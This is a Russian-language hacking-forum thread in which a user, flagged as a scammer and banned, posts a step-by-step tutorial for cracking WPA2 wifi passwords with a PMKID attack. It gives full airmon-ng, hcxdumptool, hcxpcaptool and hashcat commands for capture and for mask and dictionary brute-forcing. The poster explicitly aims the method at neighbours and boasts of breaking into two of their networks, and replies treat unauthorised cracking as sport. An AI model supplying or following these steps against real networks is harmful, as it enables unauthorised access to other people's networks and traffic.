• XSS.stack #1 – первый литературный журнал от юзеров форума

Ломаем валю за пол часа

opt1k

ripper
КИДАЛА
Регистрация
18.04.2019
Сообщения
69
Реакции
20
Гарант сделки
1
Пожалуйста, обратите внимание, что пользователь заблокирован
Не знаю была ли тут статья такая, возможно она просто под хайдом от меня, все же опишу способ на всякий случай.
Насколько мне известно способ был обнаружен во время тестирования алгоритма wpa3. Не требуется ждать клиента и деаутентифицировать, перехватывать хендшейк и прочее. На каких моделях роутеров данный способ работает точно не могу сказать, но в моем окружении из 4х точек с более менее стабильным сигналом, я захватил две. Больше мне и не надо(основной + запасной каналы).

Подготовка
Устанавливаем на нашу машину(возможно уже у кого то есть часть этих инструментов из коробки):
1. airmon-ng + airodump-ng http://aircrack-ng.org/
2. hcxdumptool https://github.com/ZerBea/hcxdumptool
3. hcxpcaptool https://github.com/ZerBea/hcxtools
4. hashcat https://hashcat.net/hashcat/

По поводу установки расписывать не буду, мануалов полно. Все дальнейшие действия я производил в Debian, поэтому в других дистрах и винде команды могут отличаться, но принцип остается тем же.


Приступим
Картинки взяты с гугла, поэтому сильно не ориентируйтесь по ним.

Первым делом запустим нашу карту в режим монитора.
Bash:
sudo airmon-ng start wlan0
Имя своего wifi интерфейса можно посмотреть в набрав команду ifconfig(для меня это wlan0).
Далее начинаем захват пакетов с помощью утилиты airodump.
Bash:
sudo airodump-ng wlan0mon
wlna0mon - интерфейс монитора, который появится в списке ifconfig, после старта первой команды.
Видим следующее
GYynpKr.png


Из списка выбираем более или менее устойчивый.
Далее сохраняем его BSSID
Bash:
echo "98DED0EF7060" > filter.txt
Обратите внимание что BSSID мы записываем без ":"

Ну и приступим к основному.
Первым шагом мы должны получить pmkid точки. Делается это так
Bash:
sudo hcxdumptool -o hash -i wlan0mon --filterlist=filter.txt --filtermode=2 --enable_status=1,2
Что это за ключи и какие значения они могут принимать, вы можете почитать набрав hcxdumptool -h.
В кратце основные --o hash - тут сохранится собственно сам pmkid. --i wlan0mon - интерфейс мониторящей карты. --filterlist - наш сохраненный bssid.
После того как ввели команду увидите примерно следующее
oaeoufJ.png

Как только увидим надпись
Bash:
[FOUND PMKID]
Можем смело жать CTRL + C и приступать к расшифровке.
Приведем наш pmkid в удобочитаемый вид для hashcat
Bash:
sudo hcxpcaptool -z hashtocrack hash
Если набрать
Bash:
cat hashtocrack
То получим примерно следующее
Bash:
ef2115548399c67c69639f04feaeebdb:98ded0ef7060:28565aba7224
Далее заряжаем наш hashcat
Команда для перебора численых паролей из 8 цифр
Bash:
sudo hashcat -m 16800 hashtocrack -a 3 -w 3 '?d?d?d?d?d?d?d?d' --force
'?d?d?d?d?d?d?d?d' - это собственно маска. По маскам можете почитать доки hashcat
Комнда для перебора по словарю
Bash:
sudo hashcat -m 16800 hashtocrack wordlist.txt --force
Свой hashcat я настроил на брут GPU поэтому по маске из 8 цифр это 10кк паролей, перебирает около часа. По словарям тоже очень быстро работает.
Надеюсь статья была полезной. Хорошей охоты на соседей!

DNzmn45.jpg
 
На античате и борде hashcat разбирали эту атаку с подробностями - ощутимой разницы в скорости перебора нет. Плюс только в том, что бьется точка без клиентов.
За полчаса адекватную точку не ломануть брутом. Разве что соседа долбоеба.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Тупо копипаст темы. ТС даже не удосужился картинки перезалить, чтобы они работали...
Ну да, это я и есть, просто писать лень снова
 
Пожалуйста, обратите внимание, что пользователь заблокирован
На античате и борде hashcat разбирали эту атаку с подробностями - ощутимой разницы в скорости перебора нет. Плюс только в том, что бьется точка без клиентов.
За полчаса адекватную точку не ломануть брутом. Разве что соседа долбоеба.
Ну это от словарей зависит. А вообще разница в скорости есть. Проверено. Но в целом ты прав
 
Ну это от словарей зависит.
Нет, не зависит. Если уникальный пасс, более 8 символов, то словарем не сбрутишь.
А вообще разница в скорости есть.
Буквально 1-2 процента в плюс. Ощутимо разве что на двух rtx 2080 ti.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Ну и я эту тему немного поиизучал, алгоритм формирующий pmkid в принципе не очень сложен и дофига паролей можно ломануть, ну если город большой. У меня просто не очень большой. 300к население, но при этом я двух соседей ломанул
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Нет, не зависит. Если уникальный пасс, более 8 символов, то словарем не сбрутишь.

Буквально 1-2 процента в плюс. Ощутимо разве что на двух rtx 2080 ti.
Бро у меня карта Nvidia 920Mx, час пребором 8ми знаковый словарь проходит, а то что ты говоришь вообще летает
 
Ну из 8ми цифр. А второй был буквенный, но простой
Это не пароль, а х#йня.
Пароль - случайные символы, цифры, буквы нижнего и верхнего регистра. 8 символов это минимум для основных протоколов.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Это не пароль, а х#йня.
Пароль - случайные символы, цифры, буквы нижнего и верхнего регистра. 8 символов это минимум для основных протоколов.
Ну просто суть, что 10 миллионов комбинаций в принципе. Так же ты можешь зарядить любой словарь и юзать. Не обязательно 8ми значные же, сам понимаешь
 
А в чем суть ломать своих соседей? Ладно там если тебе инет отключили, то это прост прикол который знать надо. А так - это ж не анонимно нихуя и вообще. Но зато весело иногда вернуться к безобидному лому соседских сеток, согласен.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
А в чем суть ломать своих соседей? Ладно там если тебе инет отключили, то это прост прикол который знать надо. А так - это ж не анонимно нихуя и вообще. Но зато весело иногда вернуться к безобидному лому соседских сеток, согласен.
Да фиг знает) Просто спортивный интерес)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Лул, обычные спосою из 2013? Тут как бы на эту тему инфы много) просто лишнее вот и все, зачем копипастить?
Да это с моей темы же копипаст. Решил поделиться с людьми. Так сказать разнообразить. Мало ли кому то будет интересно и поможет такой способ. Да и люди лайкают, значит все таки для кого эта статья была полезной
 
Да это с моей темы же копипаст. Решил поделиться с людьми. Так сказать разнообразить. Мало ли кому то будет интересно и поможет такой способ. Да и люди лайкают, значит все таки для кого эта статья была полезной
полезно. спасиб)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
А с виртуалки будет работать ?
Думаю только через мост, не проверял если честн
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх